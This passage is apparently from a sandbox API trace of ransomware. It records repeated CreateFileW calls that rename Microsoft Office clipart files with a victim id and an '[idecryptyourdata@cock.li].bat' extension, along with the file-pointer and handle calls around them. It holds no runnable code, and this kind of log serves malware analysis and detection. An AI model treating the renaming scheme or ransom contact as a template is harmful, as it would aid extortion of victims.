office\\root\\clipart\\pub60cor\\j0241077.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.770] CloseHandle (hObject=0x528) returned 1 [0167.483] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0167.483] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0167.483] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241773.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0241773.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.483] CloseHandle (hObject=0x42c) returned 1 [0167.484] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0167.484] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0167.484] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0386267.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0386267.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.485] CloseHandle (hObject=0x42c) returned 1 [0167.486] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0167.486] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0167.486] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0386270.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0386270.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.486] CloseHandle (hObject=0x42c) returned 1 [0167.487] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0167.487] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0167.487] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0386485.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0386485.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.487] CloseHandle (hObject=0x42c) returned 1 [0167.488] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0167.488] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0167.488] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0386764.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0386764.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.489] CloseHandle (hObject=0x42c) returned 1 [0167.489] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0167.489] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0167.490] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387337.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0387337.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.490] CloseHandle (hObject=0x42c) returned 1 [0167.490] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0167.490] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0167.491] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387578.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0387578.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.491] CloseHandle (hObject=0x42c) returned 1 [0167.491] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0167.492] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0167.492] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387591.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0387591.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.492] CloseHandle (hObject=0x42c) returned 1 [0167.492] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0167.492] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0167.492] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387604.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0387604.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.493] CloseHandle (hObject=0x42c) returned 1 [0167.494] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0167.494] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0167.494] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387882.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0387882.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.494] CloseHandle (hObject=0x42c) returned 1 [0167.496] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0167.496] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0167.496] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387895.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0387895.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.496] CloseHandle (hObject=0x42c) returned 1 [0167.497] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0167.497] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0167.497] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0390072.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0390072.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.497] CloseHandle (hObject=0x42c) returned 1 [0167.499] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0167.499] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0167.500] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0400001.PNG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0400001.png.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.500] CloseHandle (hObject=0x42c) returned 1 [0167.501] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0167.501] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0167.501] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0400002.PNG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0400002.png.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.501] CloseHandle (hObject=0x42c) returned 1 [0167.504] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0167.504] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0167.504] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0400003.PNG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0400003.png.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.505] CloseHandle (hObject=0x42c) returned 1 [0167.506] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0167.506] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0167.506] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0400004.PNG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0400004.png.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.506] CloseHandle (hObject=0x42c) returned 1 [0167.507] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0167.507] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0167.507] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0400005.PNG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0400005.png.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.507] CloseHandle (hObject=0x42c) returned 1 [0167.509] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0167.509] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0167.509] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MP00021_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\mp00021_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.509] CloseHandle (hObject=0x42c) returned 1 [0167.510] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0167.510] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0167.510] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MP00132_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\mp00132_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.511] CloseHandle (hObject=0x42c) returned 1 [0167.512] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0167.512] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0167.512] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MP00646_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\mp00646_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.512] CloseHandle (hObject=0x42c) returned 1 [0167.514] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0167.514] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0167.514] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00042_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00042_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.515] CloseHandle (hObject=0x42c) returned 1 [0167.516] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0167.516] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0167.516] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00057_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00057_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.516] CloseHandle (hObject=0x42c) returned 1 [0167.517] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0167.517] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0167.517] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00058_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00058_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.517] CloseHandle (hObject=0x42c) returned 1 [0167.518] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0167.518] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0167.518] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00068_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00068_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.519] CloseHandle (hObject=0x42c) returned 1 [0167.519] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0167.519] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0167.519] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00238_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00238_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.520] CloseHandle (hObject=0x42c) returned 1 [0169.599] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0169.599] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0169.599] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00330_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00330_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.600] CloseHandle (hObject=0x438) returned 1 [0169.601] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0169.601] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0169.601] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01358_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01358_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.601] CloseHandle (hObject=0x438) returned 1 [0169.919] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0169.919] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0169.919] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01361_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01361_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.920] CloseHandle (hObject=0x378) returned 1 [0169.921] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0169.921] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0169.921] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01849_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01849_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.921] CloseHandle (hObject=0x378) returned 1 [0169.922] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0169.922] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0169.922] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01852_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01852_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.923] CloseHandle (hObject=0x378) returned 1 [0169.924] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0169.924] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0169.924] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01858_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01858_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.924] CloseHandle (hObject=0x378) returned 1 [0169.933] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0169.933] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0169.933] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01866_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft 